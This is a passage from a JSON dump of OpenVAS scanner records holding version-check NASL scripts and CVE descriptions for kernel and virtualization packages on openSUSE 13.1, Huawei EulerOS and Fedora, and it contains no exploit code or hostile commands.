isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop\", rpm:\"virtualbox-guest-kmp-desktop~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop-debuginfo\", rpm:\"virtualbox-guest-kmp-desktop-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop\", rpm:\"virtualbox-host-kmp-desktop~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop-debuginfo\", rpm:\"virtualbox-host-kmp-desktop-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", rpm:\"xen-kmp-desktop-debuginfo~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons\", rpm:\"xtables-addons~2.3~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debuginfo\", rpm:\"xtables-addons-debuginfo~2.3~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debugsource\", rpm:\"xtables-addons-debugsource~2.3~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default\", rpm:\"xtables-addons-kmp-default~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default-debuginfo\", rpm:\"xtables-addons-kmp-default-debuginfo~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop\", rpm:\"xtables-addons-kmp-desktop~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop-debuginfo\", rpm:\"xtables-addons-kmp-desktop-debuginfo~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen\", rpm:\"xtables-addons-kmp-xen~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen-debuginfo\", rpm:\"xtables-addons-kmp-xen-debuginfo~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.11.10~25.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-xend-tools\", rpm:\"xen-xend-tools~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-xend-tools-debuginfo\", rpm:\"xen-xend-tools-debuginfo~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae\", rpm:\"cloop-kmp-pae~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae-debuginfo\", rpm:\"cloop-kmp-pae-debuginfo~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae\", rpm:\"crash-kmp-pae~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae-debuginfo\", rpm:\"crash-kmp-pae-debuginfo~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae\", rpm:\"hdjmod-kmp-pae~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae-debuginfo\", rpm:\"hdjmod-kmp-pae-debuginfo~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae\", rpm:\"ipset-kmp-pae~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae-debuginfo\", rpm:\"ipset-kmp-pae-debuginfo~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-pae\", rpm:\"iscsitarget-kmp-pae~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-pae-debuginfo\", rpm:\"iscsitarget-kmp-pae-debuginfo~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-pae\", rpm:\"ndiswrapper-kmp-pae~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-pae-debuginfo\", rpm:\"ndiswrapper-kmp-pae-debuginfo~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae\", rpm:\"pcfclock-kmp-pae~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae-debuginfo\", rpm:\"pcfclock-kmp-pae-debuginfo~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae\", rpm:\"vhba-kmp-pae~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-debuginfo\", rpm:\"vhba-kmp-pae-debuginfo~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae\", rpm:\"virtualbox-guest-kmp-pae~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae-debuginfo\", rpm:\"virtualbox-guest-kmp-pae-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae\", rpm:\"virtualbox-host-kmp-pae~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae-debuginfo\", rpm:\"virtualbox-host-kmp-pae-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae-debuginfo\", rpm:\"xen-kmp-pae-debuginfo~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae\", rpm:\"xtables-addons-kmp-pae~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae-debuginfo\", rpm:\"xtables-addons-kmp-pae-debuginfo~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-07T16:53:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2384", "CVE-2017-5753", "CVE-2015-3332", "CVE-2017-18595", "CVE-2019-0136", "CVE-2019-17666", "CVE-2016-3689", "CVE-2016-3139", "CVE-2015-9289", "CVE-2017-18551", "CVE-2016-2186", "CVE-2016-2187", "CVE-2014-5206", "CVE-2016-4569", "CVE-2016-7425", "CVE-2017-1000379", "CVE-2016-2184", "CVE-2017-1000253", "CVE-2019-17075", "CVE-2015-1350", "CVE-2014-4608", "CVE-2016-6197", "CVE-2018-14617", "CVE-2016-3138", "CVE-2016-3140", "CVE-2017-18509", "CVE-2016-4578", "CVE-2014-5207", "CVE-2015-8816", "CVE-2016-2185", "CVE-2016-6130", "CVE-2015-8844", "CVE-2015-8845", "CVE-2017-13168", "CVE-2019-17133"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-04-03T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192599", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192599", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-2599)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2599\");\n script_version(\"2020-04-03T10:35:51+0000\");\n script_cve_id(\"CVE-2014-4608\", \"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2015-1350\", \"CVE-2015-3332\", \"CVE-2015-8816\", \"CVE-2015-8844\", \"CVE-2015-8845\", \"CVE-2015-9289\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2187\", \"CVE-2016-2384\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3689\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-6130\", \"CVE-2016-6197\", \"CVE-2016-7425\", \"CVE-2017-1000253\", \"CVE-2017-1000379\", \"CVE-2017-13168\", \"CVE-2017-18509\", \"CVE-2017-18551\", \"CVE-2017-18595\", \"CVE-2017-5753\", \"CVE-2018-14617\", \"CVE-2019-0136\", \"CVE-2019-17075\", \"CVE-2019-17133\", \"CVE-2019-17666\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-03 10:35:51 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:08:20 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-2599)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2599\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2599\");\n script_xref(name:\"URL\", value:\"https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-2599 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"** DISPUTED ** Multiple integer overflows in the lzo1x_decompress_safe function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the Linux kernel before 3.15.2 allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Literal Run. NOTE: the author of the LZO algorithms says 'the Linux kernel is *not* affected, media hype.'(CVE-2014-4608)\n\nA certain backport in the TCP Fast Open implementation for the Linux kernel before 3.18 does not properly maintain a count value, which allow local users to cause a denial of service (system crash) via the Fast Open feature, as demonstrated by visiting the chrome://flags/#enable-tcp-fast-open URL when using certain 3.10.x through 3.16.x kernel builds, including longterm-maintenance releases and ckt (aka Canonical Kernel Team) builds.(CVE-2015-3332)\n\nAn elevation of privilege vulnerability in the kernel scsi driver. Product: Android. Versions: Android kernel. Android ID A-65023233.(CVE-2017-13168)\n\nAn issue was discovered in drivers/i2c/i2c-core-smbus.c in the Linux kernel before 4.14.15. There is an out of bounds write in the function i2c_smbus_xfer_emulated.(CVE-2017-18551)\n\nAn issue was discovered in net/ipv6/ip6mr.c in the Linux kernel before 4.11. By setting a specific socket option, an attacker can control a pointer in kernel land and cause an inet_csk_listen_stop general protection fault, or potentially execute arbitrary code under certain circumstances. The issue can be triggered as root (e.g., inside a default LXC container or with the CAP_NET_ADMIN capability) or after namespace unsharing. This occurs because sk_type and protocol are not checked in the appropriate part of the ip6_mroute_* functions. NOTE: this affects Linux distributions that use 4.9.x longterm kernels before 4.9.187.(CVE-2017-18509)\n\nAn issue was discovered in the Linux kernel before 4.14.11. A double free may be caused by the function allocate_trace_buffer in the file kernel/trace/trace.c.(CVE-2017-18595)\n\nAn issue was discovered in the Linux kernel through 4.17.10. There is a NULL pointer dereference and panic in hfsplus_lookup() in fs/hfsplus/dir.c when opening a file (that is purportedly a hard link) in an hfs+ filesystem that has malformed catalog data, and is mounted read-only without a metadata directory.(CVE-2018-14617)\n\nAn issue was discovered in write_tpt_entry in drivers/infiniband/hw/cxgb4/mem.c in the Linux kernel through 5.3.2. The cxgb4 driver is directly calling dma_map_single (a DMA function) from a stack variable. This could allow an attacker to trigger a Denial of Service, exploitable if this driver is used on ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2014-5077", "CVE-2014-3940", "CVE-2014-0155", "CVE-2014-0131", "CVE-2014-0100", "CVE-2014-1737", "CVE-2014-4699", "CVE-2014-1874", "CVE-2014-4508", "CVE-2014-1738", "CVE-2014-2568", "CVE-2014-4943", "CVE-2014-0206", "CVE-2014-3145", "CVE-2014-4171", "CVE-2014-1446", "CVE-2014-5206", "CVE-2014-4014", "CVE-2013-6368", "CVE-2014-3917", "CVE-2014-0196", "CVE-2014-2851", "CVE-2014-3534", "CVE-2014-2309", "CVE-2014-2678", "CVE-2014-2039", "CVE-2014-5045", "CVE-2014-4715", "CVE-2013-4579", "CVE-2014-3144", "CVE-2014-0102", "CVE-2014-3153", "CVE-2014-2580", "CVE-2013-6367", "CVE-2014-0049", "CVE-2014-0181", "CVE-2013-6376", "CVE-2014-0055", "CVE-2014-5207", "CVE-2014-1438", "CVE-2014-0077", "CVE-2013-4587", "CVE-2014-2523", "CVE-2014-0101", "CVE-2014-0069"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-08-17T00:00:00", "id": "OPENVAS:1361412562310868101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868101", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2014-9466", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2014-9466\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868101\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-17 05:07:47 +0200 (Sun, 17 Aug 2014)\");\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2014-5077\", \"CVE-2014-4171\",\n \"CVE-2014-5045\", \"CVE-2014-3534\", \"CVE-2014-4943\", \"CVE-2014-4715\",\n \"CVE-2014-4699\", \"CVE-2014-0206\", \"CVE-2014-4508\", \"CVE-2014-4014\",\n \"CVE-2014-3153\", \"CVE-2014-3940\", \"CVE-2014-3917\", \"CVE-2014-3144\",\n \"CVE-2014-3145\", \"CVE-2014-1738\", \"CVE-2014-1737\", \"CVE-2014-0181\",\n \"CVE-2014-0196\", \"CVE-2014-3122\", \"CVE-2014-2851\", \"CVE-2014-0155\",\n \"CVE-2014-2678\", \"CVE-2014-2580\", \"CVE-2014-0077\", \"CVE-2014-0055\",\n \"CVE-2014-2568\", \"CVE-2014-0131\", \"CVE-2014-2523\", \"CVE-2014-2309\",\n \"CVE-2014-0100\", \"CVE-2014-0101\", \"CVE-2014-0049\", \"CVE-2014-0102\",\n \"CVE-2014-2039\", \"CVE-2014-0069\", \"CVE-2014-1874\", \"CVE-2014-1446\",\n \"CVE-2014-1438\", \"CVE-2013-4579\", \"CVE-2013-4587\", \"CVE-2013-6376\",\n \"CVE-2013-6368\", 